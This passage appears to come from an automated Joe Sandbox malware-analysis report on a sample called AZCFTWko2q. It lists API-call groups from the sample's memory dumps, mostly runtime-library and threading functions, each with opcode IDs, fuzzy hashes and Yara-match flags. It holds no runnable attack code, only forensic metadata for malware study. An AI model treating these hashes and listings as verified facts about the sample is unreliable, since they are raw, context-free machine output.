                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                                      APIs
• Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
  • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
  • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
• GetLastError.KERNEL32 ref: 00413541
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
• __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
  • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
• String ID:
• API String ID: 1674182817-0
• Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
• Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024DD088
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024DD0AC
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024DD0BF
• __CxxThrowException@8.LIBVCRUNTIME ref: 024DD0CD
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3657713681-0
• Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
• Instruction ID: b133972a85dcb78e6fe189d8df57f1c85926d33bdfad2fd17e28cae86ba71ccd
• Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
• Instruction Fuzzy Hash: B8F05936E00204E3C725FA16D860D5EB37A9ED0B183A0852FD80557289DB31A90ACE62

APIs
• std::_Cnd_initX.LIBCPMT ref: 024C5A83
• __Cnd_signal.LIBCPMT ref: 024C5A8F
• std::_Cnd_initX.LIBCPMT ref: 024C5AA4
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024C5AAB
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: e1708fdd5644ad95e6e352a4f0b99c7eb75359d2f58bfffaa21d6bff62617db7
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: B6F0E539400700EFEB657B7BD80571A73E3AF01328F74482FE05A969A0DFBAE8148E55

APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024D286F
• GetLastError.KERNEL32(?,?,?,?,024D8830,?,?,?,?,00000000,?,00000000), ref: 024D287E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2894
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D28A2
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
• String ID:
• API String ID: 3803302727-0
• Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction ID: e3f0846953e47bae62c94b55cea0850d469fd2712403c4d290456520c8063172
• Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction Fuzzy Hash: 60F0A03450020ABBCF00EFB5CD44EAF37B86B00701F200616F921E20A1DB75D6049B64

APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
• GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
• String ID:
• API String ID: 3803302727-0
• Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
• Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

APIs
• ___crtCreateEventExW.LIBCPMT ref: 024D2593
• GetLastError.KERNEL32(?,?,?,?,?,024D0DA0), ref: 024D25A1
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D25B7
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D25C5
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
• String ID:
• API String ID: 200240550-0
• Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction ID: 4fb4ebef4aa5b2efcda973f871db5de69500fc4089e686306d836a9479c7901b
• Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE0D86160021539EB10F7764C32F7B369C5B00B41F54085AFD15E21C2FAD5E10449A4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 200240550-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2959: TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,024D0DA0), ref: 024E3BE6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024E3BF8
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024E3C0E
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E3C1C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction ID: 02904571e3068f448a2adb13cf8600342ef3c3ecb4dba3a42be15e99bcb7cbe2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E061345002056FDB00FF775C5967F3A646A003037100EABE927D31E2EB35D0054E5C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D279E
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D27AD
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D27C3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D27D1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction ID: 2273669cd7aa61b4e11c449df833e79c751df83d04d4f1c7c7468d3929b81fd5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10E0867860010AA7CB10FBB6DD49EAF73BC6E00B06B600566E915E3151EBA9D7088B79
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
• Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
• Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

APIs
• SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
• GetLastError.KERNEL32 ref: 024D2904
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D291A
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2928
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: ffb71400c590614d438e3b0c0ec50f2094892fbde1828a2bbec055433c675308
• Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction Fuzzy Hash: 76E0863460010967DF14FF72CD05BBB37AC7F00745B500966FC15D20A1EB76D1048A98

APIs
• TlsSetValue.KERNEL32(?,00000000,024D7BD8,00000000,?,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29BE
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024D29CA
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D29E0
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D29EE
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
• API String ID: 1964976909-0
• Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction ID: 831fb25a63ebcbc694f7501391d7b1f5e527aae6e41b028b5350b1b541343898
• Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction Fuzzy Hash: 09E086342001096BDF10FF71CC08BBF376C6F00745B500966FD19D20A1EB76D1149AA8

APIs
• SetThreadPriority.KERNEL32(?,?), ref: 00412691
• GetLastError.KERNEL32 ref: 0041269D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
• __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
• Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

APIs
• TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
• API String ID: 1964976909-0
• Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
• Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
• Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

APIs
• TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
• GetLastError.KERNEL32 ref: 024D296C
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2982
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2990
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3103352999-0
• Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction ID: e1d80c824b98b0671147d1b610b0e9e8808907467c2d582b7aa7e6a49ac86936
• Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction Fuzzy Hash: 2CE0C230100105678B14FBB99C48A7B32A86A01716B600B6BF871E30E1EBA9D1084AA8

APIs
• TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• GetLastError.KERNEL32 ref: 00412705
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024FB32B,?,00000050,?,?,?,?,?), ref: 024FB1AB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 6dc8561be9c3b197c987c549b32d6757210d39e4635540fdf6410c5b1cc622e7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD21A762A00105A6EBB68F54CF01797725AEBCABDDF4A8126EB09D7304E732D941C390
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
